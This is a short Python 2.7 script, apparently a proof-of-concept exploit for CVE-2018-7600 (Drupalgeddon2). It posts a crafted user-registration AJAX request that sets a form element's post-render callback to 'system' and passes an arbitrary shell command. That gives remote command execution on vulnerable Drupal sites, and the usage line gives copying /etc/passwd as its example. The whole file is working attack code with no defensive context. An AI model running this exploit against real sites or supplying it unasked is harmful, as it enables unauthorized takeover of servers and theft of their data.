#!/usr/bin/env

import sys
import requests

def run(base_url, cmd):
	target = base_url + 'user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
	body   = {
		'form_id':              'user_register_form', 
		'_drupal_ajax':         '1', 
		'mail[#post_render][]': 'system', 
		'mail[#type]':          'markup', 
		'mail[#markup]':        cmd
	}

	try:
		resp = requests.post(target, body)
		print 'status code={}'.format(resp.status_code)
		print resp.text
	except Exception as e:
		raise

if __name__ == '__main__':
	if len(sys.argv) != 3:
		print 'Usage: python2.7 CVE-2018-7600.py http://127.0.0.1 "cp /etc/passwd /tmp"'
		sys.exit(0)

	run(sys.argv[1], sys.argv[2])
	